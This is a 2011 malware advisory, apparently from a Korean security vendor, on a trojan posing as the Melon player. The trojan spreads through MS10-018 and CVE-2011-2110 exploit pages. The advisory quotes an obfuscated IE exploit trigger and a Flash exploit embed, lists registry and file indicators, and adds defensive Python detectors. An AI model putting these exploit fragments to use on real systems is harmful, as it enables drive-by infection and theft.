
6/30/2011

[Warning] A malicious file masquerading as the Melon player is spreading.

1. Introduction

Recently, a malicious-file spreading technique that uses a Flash Player vulnerability to download or execute additional malicious files has become prevalent.
If a computer is infected with this malicious file, various malicious behaviors can be performed on it without the user noticing.
Therefore, users need to pay special attention to this prevalent malicious file in order to avoid it.



2. Spreading path and symptoms of infection

Masquerading as the player of a famous Korean music service, the malicious file can be downloaded and installed on the user's PC by a malicious SWF file that uses a Flash Player vulnerability (CVE-2011-2110).

The initial spread began with a script file inserted via a URL such as the one below. The script then continues after checking the Internet Explorer version and the Adobe Flash Player version.

* Malicious script used to spread the Melon Player malicious file

- http://(omit)/share/a1.html

* HTML and SWF files containing the malicious script

The following figure shows the internal code of a1.html: the routine that checks the IE version and the Flash Player version and then executes the matching SWF file.


The following URLs are the list from which the additional malicious script files are downloaded.

* Download URL list for the additional malicious script files

- http://(~~)/share/a1.html
- http://(~~)/share/a2.html (MS10-018 vulnerability)
- http://(~~)/share/a3.html (CVE-2011-2110 vulnerability)

The a2.html and a3.html files contain code that uses the MS10-018 vulnerability and the CVE-2011-2110 vulnerability, respectively.


* MS10-018 vulnerability (a2.html)



// a2.html (MS10-018)
function sclick()
{
    var zmaqwekjsax = document.createElement("B"+"O"+"D"+"Y");
    zmaqwekjsax.addBehavior("#"+"d"+"e"+"f"+"a"+"u"+"l"+"t"+"#"+"u"+"s"+"e"+"r"+"Da"+"t"+"a");
    document.appendChild(zmaqwekjsax);
    try
    {
        for (i=0;i<10;i++)
        {
            zmaqwekjsax.setAttribute('s',window);
        }
    }
    catch(e)
    {}
    window.status+='';
}

* CVE-2011-2110 vulnerability (a3.html)



<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="550" height="400" id="test" align="middle">
  <param name="movie" value="basic.swf?info=02E6B(~~)B51D3527B7AF28B7394" />
  <param name="quality" value="high" />
  <param name="bgcolor" value="#ffffff" />
  <param name="play" value="true" />
  <param name="loop" value="true" />
  <param name="wmode" value="window" />
  <param name="scale" value="showall" />
  <param name="menu" value="true" />
  <param name="devicefont" value="false" />
  <param name="salign" value="" />
  <param name="allowScriptAccess" value="sameDomain" />
  <!--[if !IE]>-->
  <object type="application/x-shockwave-flash" data="basic.swf?info=02E6B(~~)B7394" width="550" height="400">
    <param name="movie" value="basic.swf?info=02E6B(~~)B51D3527B7AF28B7394" />
    <param name="quality" value="high" />
    <param name="bgcolor" value="#ffffff" />
    <param name="play" value="true" />
    <param name="loop" value="true" />
    <param name="wmode" value="window" />
    <param name="scale" value="showall" />
    <param name="menu" value="true" />
    <param name="devicefont" value="false" />
    <param name="salign" value="" />
    <param name="allowScriptAccess" value="sameDomain" />
  </object>
  <!--<![endif]-->
</object>
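The a2.html and a3.html fragments above share two traits a defender can key on: JavaScript identifiers rebuilt from one- or two-character string literals, and a Flash object whose SWF is loaded with a long hexadecimal "info" parameter. The Python scanner below is an added example (not code from the original post or from INCA Internet) that collapses the concatenations, checks for the userData-behavior pattern, and reports SWF embeds carrying a long hex parameter. The HTML samples inside it are constructed to mirror the two fragments; the hex value and the 16-digit threshold are placeholders chosen for the example.

```python
import re

# Constructed HTML samples modelled on the a2.html / a3.html fragments in the report.
# They are not captures; the hex 'info' value is a placeholder.
SAMPLE_A2 = '''<script>
function sclick()
{
var zmaqwekjsax = document.createElement("B"+"O"+"D"+"Y");
zmaqwekjsax.addBehavior("#"+"d"+"e"+"f"+"a"+"u"+"l"+"t"+"#"+"u"+"s"+"e"+"r"+"Da"+"t"+"a");
document.appendChild(zmaqwekjsax);
try { for (i=0;i<10;i++) { zmaqwekjsax.setAttribute('s',window); } } catch(e) {}
window.status+='';
}
</script>'''

SAMPLE_A3 = '''<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="550" height="400">
<param name="movie" value="basic.swf?info=02E6B0123456789ABCDEF0123456789B7394" />
<param name="allowScriptAccess" value="sameDomain" />
</object>'''

SAMPLE_BENIGN = '''<object type="application/x-shockwave-flash" data="player.swf?autoplay=1"></object>
<script>var title = "Now" + " playing";</script>'''

# Three or more one/two-character literals joined with '+', e.g. "B"+"O"+"D"+"Y".
CONCAT_RE = re.compile(r'(?:"[^"\\]{1,2}"\s*\+\s*){2,}"[^"\\]{1,2}"')
PIECE_RE = re.compile(r'"([^"\\]{1,2})"')
# A .swf loaded through data=/value= with an 'info' query string made of hex digits.
SWF_INFO_RE = re.compile(r'(?:data|value)\s*=\s*"([^"]*\.swf\?info=([0-9a-f]+))"', re.I)
FLASH_CLSID = "d27cdb6e-ae6d-11cf-96b8-444553540000"
MIN_HEX_LEN = 16  # constructed threshold: long enough to be an encoded payload, not a short flag


def collapse_concats(text):
    """Replace each run of tiny concatenated literals with the single string it builds."""
    return CONCAT_RE.sub(lambda m: '"' + "".join(PIECE_RE.findall(m.group(0))) + '"', text)


def rebuilt_strings(text):
    """Return the strings that the concatenation runs in `text` evaluate to."""
    return ["".join(PIECE_RE.findall(m.group(0))) for m in CONCAT_RE.finditer(text)]


def scan_html(text):
    """Return a list of human-readable findings for one HTML/JS document."""
    findings = []
    rebuilt = rebuilt_strings(text)
    if rebuilt:
        findings.append("string-concat obfuscation builds: " + ", ".join(rebuilt))
    flat = collapse_concats(text)
    # MS10-018-style pattern: a userData behavior whose attribute is set to the window object.
    if ("addBehavior" in flat and "#default#userData" in flat
            and re.search(r"setAttribute\([^)]*\bwindow\b", flat)):
        findings.append("userData behavior with window as attribute value (MS10-018 pattern)")
    lowered = text.lower()
    flash_embed = FLASH_CLSID in lowered or "application/x-shockwave-flash" in lowered
    for m in SWF_INFO_RE.finditer(text):
        if flash_embed and len(m.group(2)) >= MIN_HEX_LEN:
            findings.append("SWF loaded with long hex 'info' parameter: " + m.group(1))
    return findings


if __name__ == "__main__":
    for label, sample in (("a2", SAMPLE_A2), ("a3", SAMPLE_A3), ("benign", SAMPLE_BENIGN)):
        print(label, scan_html(sample) or "clean")
```

The concatenation regex only collapses runs of one- or two-character literals, so ordinary code such as `"Now" + " playing"` is left alone; the keyword check runs on the collapsed text so that `addBehavior` and `#default#userData` are seen even when the original spelled them one letter at a time.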


The following figure shows the internal code of the SWF file, which contains the malicious code executed by the malicious script. It also shows the shellcode information (loading a library, then downloading the malicious file disguised as the Melon Player) and the decoded result.



* Adobe Flash Player latest security patch
http://www.adobe.com/go/getflash

* Malicious file masquerading as Melon Player 3.0

Finally, the malicious script and the SWF file that use the vulnerability download the file "fatt.txt". At a glance it looks like a .TXT file, but after a decoding process it is converted into an .EXE file capable of infecting the system.
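The report does not give the decoding scheme for fatt.txt, so the added example below (not from the original post or from INCA Internet) skips that step and shows the check a defender applies to the downloaded or decoded result: classify a file by its header bytes rather than its extension, so that a .txt name carrying a PE image or an SWF stands out. The byte strings it tests are constructed (a minimal MZ/PE header, a compressed-SWF header, and plain text).

```python
import struct

# Printable ASCII plus tab/CR/LF; anything outside this set is not "text" for our purposes.
TEXT_BYTES = set(range(0x20, 0x7F)) | {0x09, 0x0A, 0x0D}


def sniff_type(data):
    """Classify a blob by its header bytes, ignoring whatever name it was served under."""
    if not data:
        return "empty"
    if data[:2] == b"MZ":
        # Follow e_lfanew (offset 0x3C) to the PE signature; a bare MZ stub is still executable.
        if len(data) >= 0x40:
            e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
            if data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
                return "pe-executable"
        return "mz-executable"
    if data[:3] in (b"FWS", b"CWS", b"ZWS"):  # raw, zlib-compressed and LZMA-compressed SWF
        return "swf"
    if all(b in TEXT_BYTES for b in data[:512]):
        return "text"
    return "binary"


def extension_mismatch(name, data):
    """True when the name promises harmless text but the body is executable content."""
    looks_like_text = name.lower().endswith(".txt")
    return looks_like_text and sniff_type(data) in ("pe-executable", "mz-executable", "swf")


# Constructed samples: a minimal MZ/PE header, a compressed-SWF header, and plain text.
PE_SAMPLE = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40) + b"PE\0\0" + b"\0" * 20
SWF_SAMPLE = b"CWS\x0a" + b"\0" * 12
TEXT_SAMPLE = b"Melon Player 3.0 release notes\r\n"

if __name__ == "__main__":
    for name, blob in (("fatt.txt", PE_SAMPLE), ("basic.swf", SWF_SAMPLE), ("notes.txt", TEXT_SAMPLE)):
        print(name, sniff_type(blob), "MISMATCH" if extension_mismatch(name, blob) else "ok")
```

Run the check on the file as stored and again on the output of whatever decoding the sample applies; an encoded payload will classify as "binary" or "text" before decoding and as "pe-executable" afterwards, which is exactly the transition the report describes.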

The following image compares the properties of the masquerading malicious file and the normal Melon Player 3.0 installation file.
 

The original Melon Player installation file is named "MelonSetup"; because it is an integrated installation file, it does not contain version information.

If the system is infected with the decoded "fatt.txt", it creates a copy of itself and tries to register itself in the registry.
  
* Generated file
- C:\WINDOWS\winntp\cr.exe (239,108 bytes)

* Registered registry value
- Key : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
- Name : HKLM
- Data : "C:\WINDOWS\winntp\cr.exe"
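The Run-key indicator above can be checked mechanically. The following Python is an added example (not from the original post or from INCA Internet) that parses a .reg export of the Run key, flags the exact indicator from this report (value name "HKLM", data C:\WINDOWS\winntp\cr.exe), and also applies a general heuristic for autorun entries pointing into an unexpected subfolder of C:\WINDOWS. The .reg text is constructed for the example; the SecurityHealth and VMware entries are there as benign controls.

```python
import re

RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
# Indicator from this report: value name "HKLM" pointing at C:\WINDOWS\winntp\cr.exe.
IOC_VALUE_NAME = "HKLM"
IOC_PATH = r"C:\WINDOWS\winntp\cr.exe"
# Subfolders of C:\WINDOWS where autorun executables are normally expected (example list).
EXPECTED_WINDIR_SUBDIRS = {"system32", "syswow64"}
VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')

# Constructed .reg export in the format "reg export" produces (not a capture from the page).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="%windir%\\system32\\SecurityHealthSystray.exe"
"HKLM"="C:\\WINDOWS\\winntp\\cr.exe"
"VMware User Process"="\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\" -n vmusr"
'''


def parse_reg_export(text):
    """Return {key_path: {value_name: data}} for the REG_SZ values in a .reg export."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and (m := VALUE_RE.match(line)):
            # .reg files escape backslashes and quotes; undo that to get the real string.
            keys[current][m.group(1)] = m.group(2).replace("\\\\", "\\").replace('\\"', '"')
    return keys


def executable_path(data):
    """Extract the program path from Run data, which may be quoted and carry arguments."""
    if data.startswith('"'):
        return data[1:data.find('"', 1)]
    return data.split(" ")[0]


def normalize(path):
    """Lower-case and expand the common Windows-directory variables so paths compare."""
    return path.lower().replace("%windir%", r"c:\windows").replace("%systemroot%", r"c:\windows")


def suspicious_run_entries(reg_text):
    """Return (value_name, path, reasons) for each Run entry that trips a check."""
    findings = []
    for name, data in parse_reg_export(reg_text).get(RUN_KEY, {}).items():
        path = executable_path(data)
        reasons = []
        if name == IOC_VALUE_NAME and path.lower() == IOC_PATH.lower():
            reasons.append("matches known indicator (cr.exe under winntp)")
        parts = normalize(path).split("\\")
        if parts[:2] == ["c:", "windows"] and len(parts) > 3 and parts[2] not in EXPECTED_WINDIR_SUBDIRS:
            reasons.append("autorun in unexpected C:\\WINDOWS subfolder: " + parts[2])
        if reasons:
            findings.append((name, path, reasons))
    return findings


if __name__ == "__main__":
    for name, path, reasons in suspicious_run_entries(SAMPLE_REG):
        print(name, "->", path, "|", "; ".join(reasons))
```

The exact-match check catches this sample; the subfolder heuristic is what catches a renamed variant dropped under a different made-up directory, which is why both are kept. The export itself comes from `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" run.reg` on the suspect machine.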

In addition, when this file is executed it can send the information it has collected, download additional malicious files, or act as a backdoor while continuously maintaining a session connection, as in the following figure.
  

3. How to prevent

As described above, various variants of this kind of malicious file, which is spread to steal online game accounts, are emerging and being identified. Because it spreads via many well-known social-commerce sites, the range of infection can widen considerably and large financial losses and damage can follow.

In particular, it is hard for general users to tell whether they are infected, because this kind of malicious file spreads without the user noticing. To stay safe from this kind of spreading malicious file, we recommend the following "Security management tips" for general users.
  
Security management tips

1. Keep the OS and applications at the latest security update level.
2. Use anti-virus software from a trustworthy security company, keep its engine updated to the latest version, and keep the real-time detection function enabled.
3. Do not open or download attachments from suspicious e-mails.
4. Be cautious about links received through instant messengers and SNS.

INCA Internet (Security Response Center / Emergency Response Team) provides diagnosis/treatment for malicious files such as the one described above with nProtect Mobile for Android, and operates a response system against various security threats.

Diagnosis names

- Script-JS/W32.Agent.AAD
- Script-JS/W32.Agent.CGF
- Script-JS/W32.Agent.CHI
- Trojan-Exploit/W32.SWFlash.3436
- Trojan-Exploit/W32.SWFlash.3437.B
- Trojan/W32.Buzus.239108
 
